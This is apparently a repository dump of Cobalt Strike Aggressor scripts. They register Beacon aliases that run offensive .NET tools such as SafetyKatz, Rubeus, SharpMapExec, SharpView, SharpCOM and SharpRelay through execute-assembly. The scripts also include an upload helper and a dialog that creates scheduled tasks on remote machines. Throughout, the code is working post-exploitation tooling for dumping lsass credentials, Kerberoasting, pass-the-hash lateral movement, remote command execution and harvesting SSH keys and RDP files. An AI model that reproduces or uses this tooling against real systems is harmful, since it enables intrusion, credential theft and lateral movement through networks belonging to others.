" Executing $desc \'$argu\'"); 16 | } 17 | bexecute_assembly!($bid, script_resource("exe/Rubeus.exe"), $argu); 18 | } 19 | -------------------------------------------------------------------------------- /scripts/cmd/safetykatz_alias.cna: -------------------------------------------------------------------------------- 1 | beacon_command_register("safetykatz", "Creates minidump of lsass, loads custom mimikatz, steals creds, deletes minidump", 2 | "Usage: safetykatz \n\n" . 3 | "Uses execute-assembly to run the assembly and steal credentials\n"); 4 | alias safetykatz{ 5 | local('$bid $asm $desc @args $argu'); 6 | $bid = $1; 7 | $desc = "SafetyKatz"; 8 | @args = @_; 9 | remove(@args, $bid); 10 | $argu = join(' ', @args); 11 | if ($argu eq ""){ 12 | blog2($bid, "" . dstamp(ticks()) . " Executing $desc"); 13 | } 14 | else{ 15 | blog2($bid, "" . dstamp(ticks()) . " Executing $desc \'$argu\'"); 16 | } 17 | bexecute_assembly!($bid, script_resource("exe/SafetyKatz.exe"), $argu); 18 | } 19 | -------------------------------------------------------------------------------- /scripts/cmd/sessionsearcher_alias.cna: -------------------------------------------------------------------------------- 1 | beacon_command_register("searchsessions", "Searches all connected drives for PuTTY private keys and RDP connection files and parses them for relevant details.", 2 | "Usage: searchsessions [arguments]\n\n" . 3 | "Uses execute-assembly to run the assembly No Arguments Required\n"); 4 | alias searchsessions{ 5 | local('$bid $asm $desc @args $argu'); 6 | $bid = $1; 7 | $desc = "SearchSessions"; 8 | @args = @_; 9 | remove(@args, $bid); 10 | $argu = join(' ', @args); 11 | if ($argu eq ""){ 12 | blog2($bid, "" . dstamp(ticks()) . " Executing $desc"); 13 | } 14 | else{ 15 | blog2($bid, "" . dstamp(ticks()) . 
" Executing $desc \'$argu\'"); 16 | } 17 | bexecute_assembly!($bid, script_resource("exe/SearchSessions.exe"), $argu); 18 | } 19 | -------------------------------------------------------------------------------- /scripts/cmd/sharpcom_alias.cna: -------------------------------------------------------------------------------- 1 | beacon_command_register("sharpcom", "Execute's commands via various DCOM methods as demonstrated by (@enigma0x3) C#", 2 | "Usage: sharpcom [arguments]\n\n" . 3 | "Uses execute-assembly to run the assembly and takes given arguments\n"); 4 | alias sharpcom{ 5 | local('$bid $asm $desc @args $argu'); 6 | $bid = $1; 7 | $desc = "SharpCOM"; 8 | @args = @_; 9 | remove(@args, $bid); 10 | $argu = join(' ', @args); 11 | if ($argu eq ""){ 12 | blog2($bid, "" . dstamp(ticks()) . " Executing $desc"); 13 | } 14 | else{ 15 | blog2($bid, "" . dstamp(ticks()) . " Executing $desc \'$argu\'"); 16 | } 17 | bexecute_assembly!($bid, script_resource("exe/SharpCOM.exe"), $argu); 18 | } 19 | -------------------------------------------------------------------------------- /scripts/cmd/sharpmapexec_alias.cna: -------------------------------------------------------------------------------- 1 | beacon_command_register("sharpmapexec", ".NET横向移动工具", 2 | "Usage: sharpmapexec ntlm smb /user:USER /ntlm:HASH /domain:DOMAIN /computername:TARGETn\n" . 3 | "Usage: sharpmapexec -h\n\n" . 4 | "Uses execute-assembly to run the assembly and takes given arguments\n"); 5 | 6 | alias sharpmapexec{ 7 | local('$bid $asm $desc @args $argu'); 8 | $bid = $1; 9 | $desc = "sharpmapexec"; 10 | @args = @_; 11 | remove(@args, $bid); 12 | $argu = join(' ', @args); 13 | if ($argu eq ""){ 14 | blog2($bid, "" . dstamp(ticks()) . " Executing $desc"); 15 | } 16 | else{ 17 | blog2($bid, "" . dstamp(ticks()) . 
" Executing $desc \'$argu\'"); 18 | } 19 | bexecute_assembly!($bid, script_resource("exe/SharpMapExec.exe"), $argu); 20 | } 21 | -------------------------------------------------------------------------------- /scripts/cmd/sharprelay_alias.cna: -------------------------------------------------------------------------------- 1 | beacon_command_register("sharprelay", "sharprelay tools", 2 | "Usage: sharprelay servername dllpath 445 DIYPORT\n\n" . 3 | "Uses execute-assembly to run the assembly and takes given arguments\n"); 4 | alias sharprelay{ 5 | local('$bid $asm $desc @args $argu'); 6 | $bid = $1; 7 | $desc = "sharprelay"; 8 | @args = @_; 9 | remove(@args, $bid); 10 | $argu = join(' ', @args); 11 | if ($argu eq ""){ 12 | blog2($bid, "" . dstamp(ticks()) . " Executing $desc"); 13 | } 14 | else{ 15 | blog2($bid, "" . dstamp(ticks()) . " Executing $desc \'$argu\'"); 16 | } 17 | bexecute_assembly!($bid, script_resource("exe/SharpRelay.exe"), $argu); 18 | } 19 | -------------------------------------------------------------------------------- /scripts/cmd/sharpsniper_alias.cna: -------------------------------------------------------------------------------- 1 | beacon_command_register("sharpsniper", "Simple tool to find the IP address of users, must have read privs on DC", 2 | "Usage: sharpsniper emusk DomainAdminUser DAPass123\n\n" . 3 | "Usage: sharpsniper emusk\n\n" . 4 | "Uses execute-assembly to run the assembly and takes given arguments\n"); 5 | alias sharpsniper{ 6 | local('$bid $asm $desc @args $argu'); 7 | $bid = $1; 8 | $desc = "SharpSniper"; 9 | @args = @_; 10 | remove(@args, $bid); 11 | $argu = join(' ', @args); 12 | if ($argu eq ""){ 13 | blog2($bid, "" . dstamp(ticks()) . " Executing $desc"); 14 | } 15 | else{ 16 | blog2($bid, "" . dstamp(ticks()) . 
" Executing $desc \'$argu\'"); 17 | } 18 | bexecute_assembly!($bid, script_resource("exe/SharpSniper.exe"), $argu); 19 | } 20 | -------------------------------------------------------------------------------- /scripts/cmd/sharpsqltools_alias.cna: -------------------------------------------------------------------------------- 1 | beacon_command_register("sharpsqltools", "Privilege Escalation Checks", 2 | "Usage: sharpsqltools [arguments]\n\n" . 3 | "Uses execute-assembly to run the assembly and takes given arguments\n"); 4 | alias sharpsqltools{ 5 | local('$bid $asm $desc @args $argu'); 6 | $bid = $1; 7 | $desc = "sharpsqltools"; 8 | @args = @_; 9 | remove(@args, $bid); 10 | $argu = join(' ', @args); 11 | if ($argu eq ""){ 12 | blog2($bid, "" . dstamp(ticks()) . " Executing $desc"); 13 | } 14 | else{ 15 | blog2($bid, "" . dstamp(ticks()) . " Executing $desc \'$argu\'"); 16 | } 17 | bexecute_assembly!($bid, script_resource("exe/SharpSQLTools.exe"), $argu); 18 | } 19 | -------------------------------------------------------------------------------- /scripts/cmd/sharpup_alias.cna: -------------------------------------------------------------------------------- 1 | beacon_command_register("sharpup", "Privilege Escalation Checks", 2 | "Usage: sharpup [arguments]\n\n" . 3 | "Uses execute-assembly to run the assembly and takes given arguments\n"); 4 | alias sharpup{ 5 | local('$bid $asm $desc @args $argu'); 6 | $bid = $1; 7 | $desc = "SharpUp"; 8 | @args = @_; 9 | remove(@args, $bid); 10 | $argu = join(' ', @args); 11 | if ($argu eq ""){ 12 | blog2($bid, "" . dstamp(ticks()) . " Executing $desc"); 13 | } 14 | else{ 15 | blog2($bid, "" . dstamp(ticks()) . 
" Executing $desc \'$argu\'"); 16 | } 17 | bexecute_assembly!($bid, script_resource("exe/SharpUp.exe"), $argu); 18 | } 19 | -------------------------------------------------------------------------------- /scripts/cmd/sharpview_alias.cna: -------------------------------------------------------------------------------- 1 | beacon_command_register("sharpview", "C# tool to gain network situational awareness on Windows domains.", 2 | "Usage: sharpview [arguments]\n\n" . 3 | "Available arguments:\n 4 | Add-DomainGroupMember 5 | Add-DomainObjectAcl 6 | Add-ObjectAcl 7 | Add-RemoteConnection 8 | Convert-ADName 9 | ConvertFrom-SID 10 | ConvertFrom-UACValue 11 | Convert-SidToName 12 | ConvertTo-SID 13 | Export-PowerViewCSV 14 | Find-DomainLocalGroupMember 15 | Find-DomainObjectPropertyOutlier 16 | Find-DomainProcess 17 | Find-DomainShare 18 | Find-DomainUserEvent 19 | Find-DomainUserLocation 20 | Find-ForeignGroup 21 | Find-ForeignUser 22 | Find-GPOComputerAdmin 23 | Find-GPOLocation 24 | Find-InterestingDomainAcl 25 | Find-InterestingDomainShareFile 26 | Find-InterestingFile 27 | Find-LocalAdminAccess 28 | Find-ManagedSecurityGroups 29 | Get-ADObject 30 | Get-CachedRDPConnection 31 | Get-DFSshare 32 | Get-DNSRecord 33 | Get-DNSZone 34 | Get-Domain 35 | Get-DomainComputer 36 | Get-DomainController 37 | Get-DomainDFSShare 38 | Get-DomainDNSRecord 39 | Get-DomainDNSZone 40 | Get-DomainFileServer 41 | Get-DomainForeignGroupMember 42 | Get-DomainForeignUser 43 | Get-DomainGPO 44 | Get-DomainGPOComputerLocalGroupMapping 45 | Get-DomainGPOLocalGroup 46 | Get-DomainGPOUserLocalGroupMapping 47 | Get-DomainGroup 48 | Get-DomainGroupMember 49 | Get-DomainGUIDMap 50 | Get-DomainManagedSecurityGroup 51 | Get-DomainObject 52 | Get-DomainObjectAcl 53 | Get-DomainOU 54 | Get-DomainPolicy 55 | Get-DomainPolicyData 56 | Get-DomainSID 57 | Get-DomainSite 58 | Get-DomainSPNTicket 59 | Get-DomainSubnet 60 | Get-DomainTrust 61 | Get-DomainTrustMapping 62 | Get-DomainUser 63 | 
Get-DomainUserEvent
Get-Forest
Get-ForestDomain
Get-ForestGlobalCatalog
Get-ForestTrust
Get-GptTmpl
Get-GroupsXML
Get-GUIDMap
Get-IniContent
Get-IPAddress
Get-LastLoggedOn
Get-LoggedOnLocal
Get-NetComputer
Get-NetComputerSiteName
Get-NetDomain
Get-NetDomainController
Get-NetDomainTrust
Get-NetFileServer
Get-NetForest
Get-NetForestCatalog
Get-NetForestDomain
Get-NetForestTrust
Get-NetGPO
Get-NetGPOGroup
Get-NetGroup
Get-NetGroupMember
Get-NetLocalGroup
Get-NetLocalGroupMember
Get-NetLoggedon
Get-NetOU
Get-NetProcess
Get-NetRDPSession
Get-NetSession
Get-NetShare
Get-NetSite
Get-NetSubnet
Get-NetUser
Get-ObjectAcl
Get-PathAcl
Get-PrincipalContext
Get-Proxy
Get-RegistryMountedDrive
Get-RegLoggedOn
Get-SiteName
Get-UserEvent
Get-WMIProcess
Get-WMIRegCachedRDPConnection
Get-WMIRegLastLoggedOn
Get-WMIRegMountedDrive
Get-WMIRegProxy
Invoke-ACLScanner
Invoke-CheckLocalAdminAccess
Invoke-Kerberoast
Invoke-MapDomainTrust
Invoke-RevertToSelf
Invoke-UserImpersonation
New-DomainGroup
New-DomainUser
Remove-DomainObjectAcl
Remove-RemoteConnection
Request-SPNTicket
Resolve-IPAddress
Set-ADObject
Set-DomainObject
Set-DomainUserPassword
Test-AdminAccess
TestMethod");
# (the string literal and beacon_command_register call closed above begin on the
# previous line of this listing, in /scripts/cmd/sharpview_alias.cna)

# Same wrapper pattern as the other *_alias.cna scripts: join the arguments after the
# beacon id, echo them to the Beacon console with a timestamp, then execute-assembly
# exe/SharpView.exe with that argument string.
alias sharpview{
    # $asm is declared but never used
    local('$bid $asm $desc @args $argu');
    $bid = $1;
    $desc = "SharpView";
    @args = @_;
    # drop the beacon id so only the user-typed arguments are forwarded
    remove(@args, $bid);
    $argu = join(' ', @args);
    if ($argu eq ""){
        blog2($bid, "" . dstamp(ticks()) . " Executing $desc");
    }
    else{
        blog2($bid, "" . dstamp(ticks()) .
" Executing $desc \'$argu\'"); 142 | } 143 | bexecute_assembly!($bid, script_resource("exe/SharpView.exe"), $argu); 144 | } 145 | -------------------------------------------------------------------------------- /scripts/cmd/standin_alias.cna: -------------------------------------------------------------------------------- 1 | beacon_command_register("standin", "域内信息收集工具", 2 | "Usage: standin [arguments]\n\n" . 3 | "Uses execute-assembly to run the assembly and takes given arguments\n"); 4 | 5 | alias standin{ 6 | local('$bid $asm $desc @args $argu'); 7 | $bid = $1; 8 | $desc = "standin"; 9 | @args = @_; 10 | remove(@args, $bid); 11 | $argu = join(' ', @args); 12 | if ($argu eq ""){ 13 | blog2($bid, "" . dstamp(ticks()) . " Executing $desc"); 14 | } 15 | else{ 16 | blog2($bid, "" . dstamp(ticks()) . " Executing $desc \'$argu\'"); 17 | } 18 | bexecute_assembly!($bid, script_resource("exe/StandIn.exe"), $argu); 19 | } 20 | -------------------------------------------------------------------------------- /scripts/cmd/test.cna: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XTeam-Wing/WingKit/e69e554b6e04b80bb57dd882be1622432f1fd057/scripts/cmd/test.cna -------------------------------------------------------------------------------- /scripts/cmd/upload.cna: -------------------------------------------------------------------------------- 1 | beacon_command_register( 2 | "upload", 3 | "Upload a file to specified remote location.", 4 | "Use: upload [/remote/path/to/file]\n\nUpload a file from local path (first argument) to remote path (second argument, optional)."); 5 | 6 | sub interpretSize { 7 | local('$s $size'); 8 | $s = $1; 9 | 10 | if($s == 0) { 11 | $size = ""; 12 | } 13 | else if($s < 1024) { 14 | $size .= $s . 
"B"; 15 | } 16 | else if($s < 1024 * 1024) { 17 | $size = round($s / 1024.0, 1); 18 | $size .= "KB"; 19 | } 20 | else if($s < 1024 * 1024 * 1024) { 21 | $size = round(($s / 1024.0) / 1024, 1); 22 | $size .= "MB"; 23 | } 24 | else if($s < 1024 * 1024 * 1024 * 1024) { 25 | $size = round((($s / 1024.0) / 1024) / 1024, 1); 26 | $size .= "GB"; 27 | } 28 | 29 | return $size; 30 | } 31 | 32 | alias upload { 33 | local('$bid $f $localpath $remotepath $content'); 34 | ($bid, $localpath, $remotepath) = @_; 35 | 36 | if($localpath is $null || strlen($localpath) == 0) { 37 | prompt_file_open("Choose a file", $null, false, lambda({ 38 | bupload($bid, $1); 39 | }, $bid => $bid)); 40 | return; 41 | } 42 | 43 | if($localpath is $null || strlen($localpath) == 0) { 44 | berror($1, "Source file path (local path) must be specified."); 45 | return; 46 | } 47 | 48 | if(!-exists $localpath) { 49 | berror($1, "Specified input file does not exist: ( $+ $localpath $+ )"); 50 | return; 51 | } 52 | 53 | if($remotepath is $null || strlen($remotepath) == 0) { 54 | bupload($bid, $localpath); 55 | return; 56 | } 57 | 58 | try { 59 | $f = openf($localpath); 60 | $content = readb($f, -1); 61 | if($content is $null) { 62 | throw "Read empty file"; 63 | } 64 | closef($f); 65 | } 66 | catch $message { 67 | berror($1, "Could not read contents of file to upload. Error: $message"); 68 | return; 69 | } 70 | 71 | btask($1, "Tasked Beacon to upload file (size: " . interpretSize(strlen($content)) . ") from: ( $+ $localpath $+ ) to: ( $+ $remotepath $+ )"); 72 | 73 | bupload_raw!($1, $remotepath, $content, $localpath); 74 | } 75 | -------------------------------------------------------------------------------- /scripts/cmd/watson_alias.cna: -------------------------------------------------------------------------------- 1 | beacon_command_register("watson", "找出补丁和一些CVE", 2 | "Usage: watson\n\n" . 
"Uses execute-assembly to run the assembly\n");
# (the beacon_command_register call closed above starts on the previous line of this
# listing, in /scripts/cmd/watson_alias.cna)

# Same wrapper pattern as the other *_alias.cna scripts: join the arguments after the
# beacon id, echo them to the Beacon console with a timestamp, then execute-assembly
# exe/Watson.exe with that argument string.
alias watson{
    # $asm is declared but never used
    local('$bid $asm $desc @args $argu');
    $bid = $1;
    $desc = "Watson";
    @args = @_;
    # drop the beacon id so only the user-typed arguments are forwarded
    remove(@args, $bid);
    $argu = join(' ', @args);
    if ($argu eq ""){
        blog2($bid, "" . dstamp(ticks()) . " Executing $desc");
    }
    else{
        blog2($bid, "" . dstamp(ticks()) . " Executing $desc \'$argu\'");
    }
    bexecute_assembly!($bid, script_resource("exe/Watson.exe"), $argu);
}

# ---- /scripts/demo.cna ----
# Dialog box demo: sharptask opens a dialog whose text fields are turned into an
# argument string ("--AddTask" followed by "<key> <value>" pairs) for
# exe/SharpTask.exe, run through execute-assembly when the "Run" button is pressed.
# NOTE(review): $bid, $cmdargs and $dialog are not declared with local(), so they
# are script-global; the lambda below does not capture $bid and relies on that global.
sub sharptask{
    # beacon ID
    $bid = $1;
    # command argument variable, reset on every call
    $cmdargs = "";
    # Pop Dialog Box and control flow; %(execmethod => ...) seeds the dialog's value map
    $dialog = dialog("提示框头部", %(execmethod => "Execute-Assembly"), lambda({

        # $3 is the hash of dialog values. Every field that is non-empty, not a
        # boolean string and not execmethod is appended as "<key> <value>".
        # manipulate the first argument depending on the executables command line switch statements
        # manipulate the second argument depending on the expected input format
        foreach $key => $value ($3){
            if ($value ne "" && $value ne "false" && $value ne "true" && $key ne "execmethod"){
                $cmdargs .= $key;
                $cmdargs .= ' ';
                # NOTE(review): Sleep's "." concatenation is usually written with
                # spaces around it; confirm that `$value.' '` parses as intended
                $cmdargs .= $value.' ';
                $cmdargs .= ' ';
            }

        }
        # btask just displays message in beacon window
        # execute assembly it is important to notate the use of periods for concatenating the ptt switch
        # NOTE(review): the btask text says "Pass The Ticket", but this dialog creates
        # a scheduled task (see dialog_description below); the message looks copy-pasted
        if ($3["execmethod"] eq "Execute-Assembly"){
            btask($bid, 'Executing Pass The Ticket via Execute-Assembly');
            bexecute_assembly($bid, script_resource('/exe/SharpTask.exe'), '--AddTask'.$cmdargs.''."");
        }

    }));

    # Dialog box contents and text boxes mapped to command line argument keys
    # NOTE(review): every drow_text below passes "" as its key, so the values do not
    # reach $3 under six distinct keys as the comment above implies — confirm
    dialog_description($dialog, "Enter The Following Information To Create A Scheduled Task On A Remote Machine:");
    drow_text($dialog, "", "Computer");
    drow_text($dialog, "", "Time");
    drow_text($dialog, "", "Folder");
    drow_text($dialog, "", "Task Name");
    drow_text($dialog, "", "Task Description");
    drow_text($dialog, "", "Path To Executable");
    dbutton_action($dialog, "Run");
    dialog_show($dialog);
}